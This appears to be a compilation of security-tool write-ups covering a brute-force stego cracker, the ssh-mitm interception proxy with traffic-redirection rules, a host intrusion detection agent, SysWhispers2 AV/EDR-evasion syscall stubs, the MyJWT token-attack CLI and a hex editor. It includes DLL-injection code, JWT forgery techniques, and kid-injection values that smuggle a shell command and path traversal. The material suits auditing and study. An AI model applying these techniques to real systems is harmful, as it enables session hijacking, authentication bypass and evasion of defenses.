  • -f or --file-name with <file_name> is the file that stegbrute is going to attack; it must be one of these supported formats: JPEG, BMP, WAV or AU

  • -w or --wordlist with <wordlist> is the file from which stegbrute takes the passwords line by line and tries them against the file you want to crack; if you don't have one you can install, for example, rockyou.txt


Benchmark

stegbrute benchmark on different wordlists using 3 threads

Wordlist passwords | Time
-------------------+----------
100                | 841.12ms
1000               | 8.57s
10000              | 77.79s
100000             | 775.93s


Ssh-Mitm - Ssh Mitm Server For Security Audits Supporting Public Key Authentication, Session Hijacking And File Manipulation



ssh-mitm is an intercepting (mitm) proxy server for security audits.

  • Redirect/mirror Shell to another ssh client supported in 0.2.8
  • Replace File in SCP supported in 0.2.6
  • Replace File in SFTP supported in 0.2.3
  • Transparent proxy support in 0.2.2! - intercepting traffic to other hosts is now possible when using ARP spoofing or when the proxy is used as a gateway.
  • Since release 0.2.0, SSH Proxy Server has full support for tty (shell), scp and sftp!

Do not use this library in production environments! This tool is only for security audits!

Installation

pip install ssh-mitm


Start Proxy Server

Password authentication

Start the server:

ssh-mitm --remote-host 127.0.0.1

Connect to server:

ssh -p 10022 user@proxyserver

Public key authentication

When public key authentication is used, the agent is forwarded to the remote server.

Start the server:

ssh-mitm --forward-agent --remote-host 127.0.0.1

Connect to server:

ssh -A -p 10022 user@proxyserver

SSH MITM Attacks

SSH uses trust on first use. This means that you have to accept the fingerprint if it is not known.

$ ssh -p 10022 hugo@localhost
The authenticity of host '[localhost]:10022 ([127.0.0.1]:10022)' can't be established.
RSA key fingerprint is SHA256:GIAALZgy8Z86Sezld13ZM74HGbE9HbWjG6T9nzja/D8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:10022' (RSA) to the list of known hosts.

If a server fingerprint is known, ssh warns the user that the host identification has changed.

$ ssh -p 10022 remoteuser@localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
SHA256:GIAALZgy8Z86Sezld13ZM74HGbE9HbWjG6T9nzja/D8.
Please contact your system administrator.
Add correct host key in /home/user/.ssh/known_hosts to get rid of this message.
Offending RSA key in /home/user/.ssh/known_hosts:22
remove with:
ssh-keygen -f "/home/user/.ssh/known_hosts" -R "[localhost]:10022"
RSA host key for [localhost]:10022 has changed and you have requested strict checking.
Host key verification failed.

If the victim accepts the (new) fingerprint, then the session can be intercepted.
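The host-key check behind the two transcripts above, reconstructed in Python as an added example (not ssh-mitm code): it computes the OpenSSH-style SHA256 fingerprint of a presented key, compares it with a pinned known_hosts entry, and returns the three outcomes a client can land in (known and matching, known but changed, unknown). The key bytes and the known_hosts line are constructed for the demo; the host string [localhost]:10022 mirrors the transcript.

```python
"""OpenSSH-style SHA256 host-key fingerprints and a known_hosts check.

Added example, not ssh-mitm code.  The key bytes and the known_hosts line
are constructed for the demo; they are not real host keys.
"""
import base64
import hashlib
import struct


def ssh_string(data: bytes) -> bytes:
    """SSH wire 'string': big-endian uint32 length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def make_ed25519_blob(raw_key: bytes) -> bytes:
    """Public-key blob layout OpenSSH base64-encodes for ssh-ed25519 keys.
    raw_key is a constructed 32-byte value standing in for a real key."""
    return ssh_string(b"ssh-ed25519") + ssh_string(raw_key)


def fingerprint_sha256(blob: bytes) -> str:
    """Same format ssh prints: SHA256 of the key blob, base64 without '='."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_known_hosts(text: str) -> dict:
    """Map host -> (keytype, blob) for plain known_hosts lines.
    Hashed (|1|...) entries are skipped to keep the example short."""
    entries = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0].startswith("@"):          # @cert-authority / @revoked markers
            parts = parts[1:]
        if len(parts) < 3 or parts[0].startswith("|1|"):
            continue
        hosts, keytype, b64 = parts[:3]
        for host in hosts.split(","):
            entries[host] = (keytype, base64.b64decode(b64))
    return entries


def check_host_key(known_hosts: str, host: str, presented_blob: bytes) -> str:
    """'match' when the pinned key is presented, 'changed' when a different
    key is (the REMOTE HOST IDENTIFICATION HAS CHANGED case), 'unknown'
    when no entry exists (the trust-on-first-use prompt)."""
    entries = parse_known_hosts(known_hosts)
    if host not in entries:
        return "unknown"
    _, pinned_blob = entries[host]
    if fingerprint_sha256(pinned_blob) == fingerprint_sha256(presented_blob):
        return "match"
    return "changed"


# Constructed sample keys: deterministic bytes, not real keys.
REAL_SERVER_KEY = make_ed25519_blob(bytes(range(32)))
PROXY_KEY = make_ed25519_blob(bytes(range(32, 64)))

# Constructed known_hosts pinning the real server's key for [localhost]:10022,
# the host string from the transcript above.
KNOWN_HOSTS = ("[localhost]:10022 ssh-ed25519 "
               + base64.b64encode(REAL_SERVER_KEY).decode() + "\n")

if __name__ == "__main__":
    print(fingerprint_sha256(REAL_SERVER_KEY))
    print(check_host_key(KNOWN_HOSTS, "[localhost]:10022", REAL_SERVER_KEY))  # match
    print(check_host_key(KNOWN_HOSTS, "[localhost]:10022", PROXY_KEY))        # changed
    print(check_host_key(KNOWN_HOSTS, "other.example", PROXY_KEY))            # unknown
```

Pinning is what takes the interception out of the user's hands: a client run with StrictHostKeyChecking=yes and a pre-populated known_hosts never reaches the "are you sure you want to continue connecting" prompt, so a changed key is a hard failure rather than a choice.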


Use-Case: Honey Pot

When the ssh proxy server is used as a honey pot, attackers will accept the fingerprint because they want to attack this machine. An attacker also does not know whether the fingerprint is correct or whether the key has changed; perhaps the server was reinstalled and a new keypair was generated.


Use-Case: Security Audit

When trying to figure out the communication schematics of an application, intercepting ssh can be an invaluable tool.

For example, if you have an application which connects to your local router via ssh to configure the device, you can intercept those connections if the application does not know the fingerprint and accepts it on first use.

If the application knows the fingerprint, then the same host key is used on every device. In this case, you have a good chance to extract the host key from a firmware update and use it to trick the application.


Use-Case: Transparent Proxy

When the ssh proxy server needs to monitor general ssh communication in a network the transparent feature can be used.

To set up this feature correctly and intercept ssh traffic to multiple different hosts, traffic needs to be routed through the ssh proxy server.

SSH packets that need to be audited can then be transparently processed and forwarded by the ssh proxy server, making use of the TPROXY feature of the Linux kernel.

For example, when traffic is routed through a CentOS 7 machine, the following configuration can be used:


With iptables
iptables -t mangle -A PREROUTING -p tcp --dport 22 -j TPROXY --tproxy-mark 0x1/0x1 --on-port=10022 --on-ip=127.0.0.1

# Saving the configuration permanently
yum install -y iptables-services
systemctl enable iptables
iptables-save > /etc/sysconfig/iptables
systemctl start iptables

With firewalld
# Making use of directly and permanently adding a rule to the iptables table
firewall-cmd --direct --permanent --add-rule ipv4 mangle PREROUTING 1 -p tcp --dport 22 --j TPROXY --tproxy-mark 0x1/0x1 --on-port=10022 --on-ip=127.0.0.1

Note: additional firewall rules may be necessary to maintain device management capabilities over ssh.

To process the packets locally further routing needs to take place:

echo 100 tproxy >> /etc/iproute2/rt_tables
ip rule add fwmark 1 lookup tproxy
ip route add local 0.0.0.0/0 dev lo table tproxy

# Setting routes and policies persistent
echo 'from all fwmark 0x1 lookup tproxy' >> /etc/sysconfig/network-scripts/rule-lo
echo 'local default dev lo scope host table tproxy' >> /etc/sysconfig/network-scripts/route-lo

Now only the ssh proxy server needs to be started in transparent mode to be able to handle sockets that do not have local addresses:

ssh-mitm --transparent

https://powerdns.org/tproxydoc/tproxy.md.html


Available modules

The proxy can be configured and extended using command line arguments.

Some arguments accept Python-class names as string.

Loading a class from a package:

ssh-mitm --ssh-interface ssh_proxy_server.forwarders.ssh.SSHForwarder

⚠️ Creating a pip package for custom classes is recommended, because loading from files has some bugs at the moment.

Loading a class from a file (experimental):

ssh-mitm --ssh-interface /path/to/my/file.py:ExtendedSSHForwarder


SSH interface
  • cmd argument: --ssh-interface
  • base class: ssh_proxy_server.forwarders.ssh.SSHBaseForwarder
  • default: ssh_proxy_server.forwarders.ssh.SSHForwarder

Available forwarders:
  • ssh_proxy_server.forwarders.ssh.SSHForwarder - forwards traffic from client to remote server
  • ssh_proxy_server.plugins.ssh.sessionlogger.SSHLogForwarder - write the session to a file, which can be replayed with script
  • ssh_proxy_server.plugins.ssh.noshell.NoShellForwarder - keeps the session open, when used as master channel, but tty should not be possible to the remote server
  • ssh_proxy_server.plugins.ssh.mirrorshell.SSHMirrorForwarder - Mirror ssh session to another ssh client
  • ssh_proxy_server.plugins.ssh.injectorshell.SSHInjectableForwarder - Creates injection shells for listening on and writing to a ssh session

SCP interface
  • cmd argument: --scp-interface
  • base class: ssh_proxy_server.forwarders.scp.SCPBaseForwarder
  • default: ssh_proxy_server.forwarders.scp.SCPForwarder

Available forwarders:
  • ssh_proxy_server.forwarders.scp.SCPForwarder - transfer file between client and server
  • ssh_proxy_server.plugins.scp.store_file.SCPStorageForwarder - save file to file system
  • ssh_proxy_server.plugins.scp.replace_file.SCPReplaceFile - replace transferred file with another file

SFTP Handler
  • cmd argument: --sftp-handler
  • base class: ssh_proxy_server.forwarders.sftp.SFTPHandlerBasePlugin
  • default: ssh_proxy_server.forwarders.sftp.SFTPHandlerPlugin

Available forwarders:
  • ssh_proxy_server.forwarders.sftp.SFTPHandlerPlugin - transfer file between client and server
  • ssh_proxy_server.plugins.sftp.store_file.SFTPHandlerStoragePlugin - save file to file system
  • ssh_proxy_server.plugins.sftp_replace.SFTPProxyReplaceHandler - replace transferred file with another file

Authentication:
  • cmd argument: --authenticator
  • base class: ssh_proxy_server.authentication.Authenticator
  • default: ssh_proxy_server.authentication.AuthenticatorPassThrough

Available Authenticators:
  • ssh_proxy_server.authentication.AuthenticatorPassThrough - default authenticator, which can reuse credentials

Currently, only one authenticator (AuthenticatorPassThrough) exists, but it supports arguments to specify the remote host, username and password, which should fit most scenarios. (Public keys are on the roadmap.)


Authors
  • Manfred Kaiser
  • Simon Böhm


ByteDance-HIDS - A Cloud-Native Host-Based Intrusion Detection Solution Project To Provide Next-Generation Threat Detection And Behavior Audition With Modern Architecture



ByteDance-HIDS is a Cloud-Native Host-Based Intrusion Detection solution project to provide next-generation Threat Detection and Behavior Audition with modern architecture.

ByteDance-HIDS comprises three major components:

  • ByteDance-HIDS Agent, co-worked with ByteDance-HIDS Driver, is the game-changer for the Data Collection market. It works at both Kernel and User Space of Linux System, providing rich data flow with much better performance.
  • ByteDance-HIDS Server provides Service-Discovery for the production environment of up to millions of agents. The Server also supports primary data formatting along with rules distribution for the Agent.
  • ByteDance-HIDS HUB provides high-performance, lightweight, and stateless alert generation with data manipulation to analyze the rich data flow.

Now we are more than happy to announce the open-source of ByteDance-HIDS Agent and ByteDance-HIDS Driver. We decided to strengthen the Defense Community with our game-changing technology. Due to the lack of rule engine and detection functions, ByteDance-HIDS Agent and Driver doesn't provide all HIDS capability on its own. However, it is a tremendous Host-Information-Collect-Agent that could be easily integrated with current HIDS/NIDS/XDR solutions on the market. ByteDance-HIDS Agent and ByteDance-HIDS Driver together advance solutions on the market in four major areas.
  • Better performance: data is collected in kernel space, avoiding supplementary work such as traversing the '/proc' directory or collecting from other audit processes such as "auditd".
  • Hard to bypass: a specifically designed kernel driver powers data collection, making it virtually impossible for malicious software, like a rootkit, to evade detection or auditing. The Driver can even capture the evasion behavior itself.
  • Kernel + User Space: ByteDance-HIDS Agent provides user-space detection abilities, including file auditing, in-house rule detection, and primary allowlists.
  • Easy to integrate: ByteDance-HIDS can empower any user-space agent far beyond host-intrusion use cases with its detailed and reliable data flow. Wide user-action auditing can benefit both behavior analysis and compliance requests. When integrated with a NIDS, security analysts can build a comprehensive provenance graph from the network connections, along with highly traceable process trees and file audits.

System Architecture



Currently, we are only open-sourcing ByteDance-HIDS Agent && Driver. Both components have been deployed and tested in production environments for months. We welcome any suggestions and cooperation.


To be Continued
  • ByteDance-Server is under development. More Features are on the way.



SysWhispers2 - AV/EDR Evasion Via Direct System Calls



SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.

All core syscalls are supported, and example generated files are available in the example-output/ folder.


Difference Between SysWhispers 1 and 2

The usage is almost identical to SysWhispers1 but you don't have to specify which versions of Windows to support. Most of the changes are under the hood. It no longer relies on @j00ru's syscall tables, and instead uses the "sorting by system call address" technique popularized by @modexpblog. This significantly reduces the size of the syscall stubs.

The specific implementation in SysWhispers2 is a variation of @modexpblog's code. One difference is that the function name hashes are randomized on each generation. @ElephantSe4l, who had published this technique earlier, has another implementation based in C++17 which is also worth checking out.

The original SysWhispers repository is still up but may be deprecated in the future.


Introduction

Various security products place hooks in user-mode API functions, which allow them to redirect execution flow to their engines and detect suspicious behaviour. The functions in ntdll.dll that make the syscalls consist of just a few assembly instructions, so re-implementing them in your own implant can avoid triggering those security product hooks. This technique was popularized by @Cn33liz and his blog post has more technical details worth reading.

SysWhispers provides red teamers the ability to generate header/ASM pairs for any system call in the core kernel image (ntoskrnl.exe). The headers will also include the necessary type definitions.


Installation
> git clone https://github.com/jthuraisamy/SysWhispers2.git
> cd SysWhispers2
> py .\syswhispers.py --help

Usage and Examples

Command Lines
# Export all functions with compatibility for all supported Windows versions (see example-output/).
py .\syswhispers.py --preset all -o syscalls_all

# Export just the common functions (see below for list).
py .\syswhispers.py --preset common -o syscalls_common

# Export NtProtectVirtualMemory and NtWriteVirtualMemory with compatibility for all versions.
py .\syswhispers.py --functions NtProtectVirtualMemory,NtWriteVirtualMemory -o syscalls_mem

Script Output
PS C:\Projects\SysWhispers2> py .\syswhispers.py --preset common --out-file syscalls_common

. ,--.
,-. . . ,-. . , , |-. o ,-. ,-. ,-. ,-. ,-. /
`-. | | `-. |/|/ | | | `-. | | |-' | `-. ,-'
`-' `-| `-' ' ' ' ' ' `-' |-' `-' ' `-' `---
/| | @Jackson_T
`-' ' @modexpblog, 2021

SysWhispers2: Why call the kernel when you can whisper?

Common functions selected.

Complete! Files written to:
syscalls_common.h
syscalls_common.c
syscalls_common_stubs.asm

Before-and-After Example of Classic CreateRemoteThread DLL Injection
py .\syswhispers.py -f NtAllocateVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx -o syscalls

Before (Win32 API calls):

#include <Windows.h>

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
    LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

    WriteProcessMemory(hProcess, lpBaseAddress, dllPath, strlen(dllPath), nullptr);
    CreateRemoteThread(hProcess, nullptr, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpBaseAddress, 0, nullptr);
}

After (direct system calls through the generated header):

#include <Windows.h>
#include "syscalls.h" // Import the generated header.

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
    HANDLE hThread = NULL;
    LPVOID lpAllocationStart = nullptr;
    SIZE_T szAllocationSize = strlen(dllPath);
    LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

    NtAllocateVirtualMemory(hProcess, &lpAllocationStart, 0, (PULONG)&szAllocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    NtWriteVirtualMemory(hProcess, lpAllocationStart, (PVOID)dllPath, strlen(dllPath), nullptr);
    NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, lpStartAddress, lpAllocationStart, FALSE, 0, 0, 0, nullptr);
}

Common Functions

Using the --preset common switch will create a header/ASM pair with the following functions:

  • NtCreateProcess (CreateProcess)
  • NtCreateThreadEx (CreateRemoteThread)
  • NtOpenProcess (OpenProcess)
  • NtOpenThread (OpenThread)
  • NtSuspendProcess
  • NtSuspendThread (SuspendThread)
  • NtResumeProcess
  • NtResumeThread (ResumeThread)
  • NtGetContextThread (GetThreadContext)
  • NtSetContextThread (SetThreadContext)
  • NtClose (CloseHandle)
  • NtReadVirtualMemory (ReadProcessMemory)
  • NtWriteVirtualMemory (WriteProcessMemory)
  • NtAllocateVirtualMemory (VirtualAllocEx)
  • NtProtectVirtualMemory (VirtualProtectEx)
  • NtFreeVirtualMemory (VirtualFreeEx)
  • NtQuerySystemInformation (GetSystemInfo)
  • NtQueryDirectoryFile
  • NtQueryInformationFile
  • NtQueryInformationProcess
  • NtQueryInformationThread
  • NtCreateSection (CreateFileMapping)
  • NtOpenSection
  • NtMapViewOfSection
  • NtUnmapViewOfSection
  • NtAdjustPrivilegesToken (AdjustTokenPrivileges)
  • NtDeviceIoControlFile (DeviceIoControl)
  • NtQueueApcThread (QueueUserAPC)
  • NtWaitForMultipleObjects (WaitForMultipleObjectsEx)

Importing into Visual Studio
  1. Copy the generated H/C/ASM files into the project folder.
  2. In Visual Studio, go to Project > Build Customizations... and enable MASM.
  3. In the Solution Explorer, add the .h and .c/.asm files to the project as header and source files, respectively.
  4. Go to the properties of the ASM file, and set the Item Type to Microsoft Macro Assembler.
  5. Ensure that the project platform is set to x64. 32-bit projects are not supported at this time.

Caveats and Limitations
  • Only 64-bit Windows is supported at this time.
  • System calls from the graphical subsystem (win32k.sys) are not supported.
  • Tested on Visual Studio 2019 (v142) with Windows 10 SDK.

Troubleshooting
  • Type redefinitions errors: a project may not compile if typedefs in syscalls.h have already been defined.
    • Ensure that only required functions are included (i.e. --preset all is rarely necessary).
    • If a typedef is already defined in another used header, then it could be removed from syscalls.h.

Credits

Developed by @Jackson_T and @modexpblog, but builds upon the work of many others:


Related Articles and Projects

References to SysWhispers


MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)



This CLI is for pentesters, CTF players, or developers.
You can modify your JWT, sign it, inject, etc.
Check the Documentation for more information.
If you see problems or want an enhancement, send an issue. I will respond as soon as possible. Enjoy :)


Documentation

Documentation is available at http://myjwt.readthedocs.io


Features
  • copy new jwt to clipboard
  • user Interface (thanks questionary)
  • color output
  • modify jwt (header/Payload)
  • None Vulnerability
  • RSA/HMAC confusion
  • Sign a jwt with key
  • Brute Force to guess key
  • crack jwt with regex to guess key
  • kid injection
  • Jku Bypass
  • X5u Bypass

Installation

To install myjwt, simply use pip:

pip install myjwt

To run myjwt from a docker image, run:

docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

# mount volume for wordlist
docker run -v $(pwd)/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
# On Windows
docker run -v %CD%/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

To install myjwt, on git:

git clone https://github.com/mBouamama/MyJWT.git
cd ./MyJWT
pip install -r requirements.txt
python MyJWT/myjwt_cli.py --help

To install myjwt on BlackArch:

pacman -S myjwt

Usage
$ myjwt --help
Usage: myjwt [OPTIONS] JWT

This cli is for pentesters, CTF players, or dev.
You can modify your jwt, sign, inject ,etc...
Full documentation is at http://myjwt.readthedocs.io.
If you see problems or enhancement send an issue.I will respond as soon as possible.
Enjoy :)
All new jwt will be copy to the clipboard.

Options:
--version Show the version and exit.
--full-payload TEXT New payload for your jwt.Json format Required.
-h, --add-header TEXT Add a new key, value to your jwt header, if key
is present old value will be replaced.Format:
key=value.

-p, --add-payload TEXT Add a new key, value to your jwt payload, if
key is present old value will be
replaced.Format: key=value.

--sign TEXT Sign Your jwt with key given.
--verify TEXT verify your key.
-none, --none-vulnerability Check None Alg vulnerability.
--hmac PATH Check RS/HMAC Alg vulnerability.
--bruteforce PATH Bruteforce to guess the secret used to sign the
token.

-c, --crack TEXT regex to iterate all string possibilities to
guess the secret used to sign the token.

--kid TEXT Kid Injection sql
--jku TEXT Jku Header to bypass authentication
--x5u TEXT X5u Header to bypass authen tication
--crt TEXT For x5cHeader, force crt file
--key TEXT For jku or x5c Header, force private key to
your key file

--file TEXT For jku Header and x5u Header, force file name
--print Print Decoded JWT
-u, --url TEXT Url to send your jwt.
-m, --method TEXT Method use for send request to url.(Default
GET).

-d, --data TEXT Data send to your url.Format: key=value. if
value = MY_JWT value will be replace by new
jwt.

-c, --cookies TEXT Cookies to send to your url.Format: key=value.
if value = MY_JWT value will be replace by new
jwt.

--help Show this message and exit.

Modify JWT

Option            | Type      | Example           | Help
------------------+-----------+-------------------+--------------------------------------------------------------------------------------------
--full-payload    | JSON      | {"user": "admin"} | New payload for your jwt.
-h, --add-header  | key=value | user=admin        | Add a new key, value to your jwt header; if the key is present the old value will be replaced.
-p, --add-payload | key=value | user=admin        | Add a new key, value to your jwt payload; if the key is present the old value will be replaced.

Check Your JWT (HS alg)

Option   | Type | Example     | Help
---------+------+-------------+----------------------------
--sign   | text | mysecretkey | Sign your jwt with your key
--verify | text | mysecretkey | Verify your key.

Exploit

Option                      | Type    | Example                  | Help
----------------------------+---------+--------------------------+--------------------------------------------------------------------------------------------------------------------------------
-none, --none-vulnerability | Nothing |                          | Check None Alg vulnerability.
--hmac                      | PATH    | ./public.pem             | Check RS/HMAC Alg vulnerability, and sign your jwt with the public key.
--bruteforce                | PATH    | ./wordlist/big.txt       | Bruteforce to guess the secret used to sign the token. Use a txt file with all passwords stored (one per line).
--crack                     | REGEX   | "[a-z]{4}"               | Regex to iterate all string possibilities to guess the secret used to sign the token.
--kid                       | text    | "00; echo /etc/.passwd"  | Kid Injection sql
--jku                       | text    | MYPUBLICIP               | Jku Header to bypass authentication; use --file if you want to change your jwks file name, and --key if you want to use your own private pem
--x5u                       | text    | MYPUBLICIP               | For jku or x5c Header; use --file if you want to change your jwks file name, and --key if you want to use your own private pem

Send your jwt

Option        | Type      | Example                                                 | Help
--------------+-----------+---------------------------------------------------------+------------------------------------------------------------------------------------------
-u, --url     | url       | http://challenge01.root-me.org/web-serveur/ch59/admin   | Url to send your jwt.
-m, --method  | text      | POST                                                    | Method used to send the request to the url (Default: GET).
-d, --data    | key=value | secret=MY_JWT                                           | Data sent to your url. Format: key=value. If value = MY_JWT, the value will be replaced by your new jwt.
-c, --cookies | key=value | secret=MY_JWT                                           | Cookies sent to your url. Format: key=value. If value = MY_JWT, the value will be replaced by your new jwt.

Other

Option    | Type    | Example       | Help
----------+---------+---------------+------------------------------------------------------
--crt     | PATH    | ./public.crt  | For x5c Header, force crt file
--key     | PATH    | ./private.pem | For jku or x5c Header, force private key to your key file
--file    | text    | myfile        | For jku Header, force file name without .json extension
--print   | Nothing |               | Print Decoded JWT
--help    | Nothing |               | Show help message and exit.
--version | Nothing |               | Show Myjwt version

Examples

Modify your Jwt

CLI
myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"

Code
from myjwt.modify_jwt import add_header, change_payload
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt

jwt = "YOUR_JWT"  # the token to modify
jwt_json = jwt_to_json(jwt)
jwt_json = add_header(jwt_json, {"kid": "001"})
jwt_json = change_payload(jwt_json, {"username": "admin"})
# re-encode header.payload and keep the original signature
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

Full example here: 01-modify-jwt


None Vulnerability

CLI
myjwt YOUR_JWT --none-vulnerability

CODE
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability

jwt = "YOUR_JWT"  # the token to test
jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])

Full example here: 02-none-vulnerability


Sign Key

CLI
myjwt YOUR_JWT --sign YOUR_KEY

CODE
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json

jwt = "YOUR_JWT"  # the token to sign
key = "test"
jwt = signature(jwt_to_json(jwt), key)

Full example here: 03-sign-key


Brute Force

CLI
myjwt YOUR_JWT --bruteforce PATH

CODE
from myjwt.vulnerabilities import bruteforce_wordlist

jwt = "YOUR_JWT"  # the token whose secret is being guessed
wordlist = "../../wordlist/common_pass.txt"
key = bruteforce_wordlist(jwt, wordlist)

Full example here: 04-brute-force


Crack

CLI
myjwt YOUR_JWT --crack REGEX

RSA/HMAC Confusion

CLI
myjwt YOUR_JWT --hmac FILE

CODE
from myjwt.vulnerabilities import confusion_rsa_hmac

jwt = "YOUR_JWT"  # the token to test
file = "public.pem"
jwt = confusion_rsa_hmac(jwt, file)

Full example here: 05-rsa-hmac-confusion
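Both checks above (the None vulnerability and the RSA/HMAC confusion) target the same verifier mistake: letting the token's own alg header choose the algorithm. The following is an added example, not MyJWT code: a stdlib-only HS256 implementation with a vulnerable verifier beside a hardened one that pins the algorithm server-side. Tokens, claims and the secret are constructed for the demo.

```python
"""Vulnerable-versus-hardened JWT verification (HS256, stdlib only).

Added example, not MyJWT code.  Tokens, claims and the secret below are
constructed for the demo.
"""
import base64
import hashlib
import hmac
import json

# The server-side decision: this verifier only ever accepts HS256.
EXPECTED_ALG = "HS256"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_sign(signing_input: bytes, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def encode_jwt(header: dict, payload: dict, secret: bytes) -> str:
    """header.payload.signature; an 'alg: none' header yields an empty signature."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    if header.get("alg") == "none":
        return f"{h}.{p}."
    sig = hs256_sign(f"{h}.{p}".encode(), secret)
    return f"{h}.{p}.{b64url_encode(sig)}"


def split_jwt(token: str):
    """Return (header, payload, signing_input, signature) without verifying."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    return header, payload, f"{h}.{p}".encode(), b64url_decode(s)


def verify_trusting_header(token: str, secret: bytes):
    """VULNERABLE: dispatches on whatever 'alg' the token itself claims.
    This is the verifier --none-vulnerability is designed to catch."""
    header, payload, signing_input, sig = split_jwt(token)
    alg = header.get("alg")
    if alg == "none":
        return payload                      # unsigned token accepted as-is
    if alg == "HS256" and hmac.compare_digest(sig, hs256_sign(signing_input, secret)):
        return payload
    return None


def verify_pinned(token: str, secret: bytes):
    """HARDENED: the server decides the algorithm.  A header naming anything
    else is rejected before any cryptography runs.  The same rule closes
    RS/HMAC confusion: a server pinned to RS256 never hands its public key
    to an HMAC just because a token asked for HS256."""
    header, payload, signing_input, sig = split_jwt(token)
    if header.get("alg") != EXPECTED_ALG:
        return None
    if not hmac.compare_digest(sig, hs256_sign(signing_input, secret)):
        return None
    return payload


# Constructed sample: a legitimately issued token, a forged unsigned copy with
# an escalated claim, and a good token whose signature has been tampered with.
SECRET = b"constructed-demo-secret"            # placeholder, not a real key
GOOD_TOKEN = encode_jwt({"alg": "HS256", "typ": "JWT"}, {"user": "alice"}, SECRET)
FORGED_NONE_TOKEN = encode_jwt({"alg": "none", "typ": "JWT"}, {"user": "admin"}, b"")
TAMPERED_TOKEN = GOOD_TOKEN.rsplit(".", 1)[0] + ".AAAA"

if __name__ == "__main__":
    for name, token in [("good", GOOD_TOKEN), ("forged none", FORGED_NONE_TOKEN),
                        ("tampered", TAMPERED_TOKEN)]:
        print(f"{name:12} trusting-header -> {verify_trusting_header(token, SECRET)}")
        print(f"{name:12} pinned          -> {verify_pinned(token, SECRET)}")
```

Running it shows the forged none token accepted by the header-trusting verifier and rejected by the pinned one, while the legitimately signed token passes both and the tampered one passes neither. Any JWT library worth deploying exposes the equivalent of EXPECTED_ALG as an allow-list parameter; the fix is to set it, not to inspect the header.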


Kid Injection

CLI
myjwt YOUR_JWT --kid INJECTION

Code
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid

jwt = "YOUR_JWT"  # the token to modify
injection = "../../../../../../dev/null"
sign = ""
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)

Full example here: 06-kid-injection


Send your new Jwt to url

CLI
myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --none-vulnerability --add-payload "username=admin"

Jku Vulnerability

CLI
myjwt YOUR_JWT --jku YOUR_URL

Code
from myjwt.vulnerabilities import jku_vulnerability

jwt = "YOUR_JWT"  # the token to modify
new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(new_jwt)

Full example here: 07-jku-bypass


X5U Vulnerability

CLI
myjwt YOUR_JWT --x5u YOUR_URL

Code
from myjwt.vulnerabilities import x5u_vulnerability

jwt = "YOUR_JWT"  # the token to modify
new_jwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(new_jwt)

Full example here: 08-x5u-bypass


Download

Check github releases. Latest is available at https://github.com/mBouamama/MyJWT/releases/latest


Contribute
  • Fork this repository or clone it
  • Create a new branch (feature, hotfix, etc...)
  • Make necessary changes and commit those changes
  • Check lint with make flake8
  • Check unit_test with make test
  • Send Pull Request I will check as Soon as Possible.

Change log

The log has become rather long. It moved to its own file.

See CHANGES.



ImHex - A Hex Editor For Reverse Engineers, Programmers And People That Value Their Eye Sight When Working At 3 AM.



A Hex Editor for Reverse Engineers, Programmers and people that value their eyesight when working at 3 AM.


Features
  • Featureful hex view
    • Byte patching
    • Patch management
    • Copy bytes as feature
      • Bytes
      • Hex string
      • C, C++, C#, Rust, Python, Java & JavaScript array
      • ASCII-Art hex view
      • HTML self contained div
    • String and hex search
    • Colorful highlighting
    • Goto from start, end and current cursor position
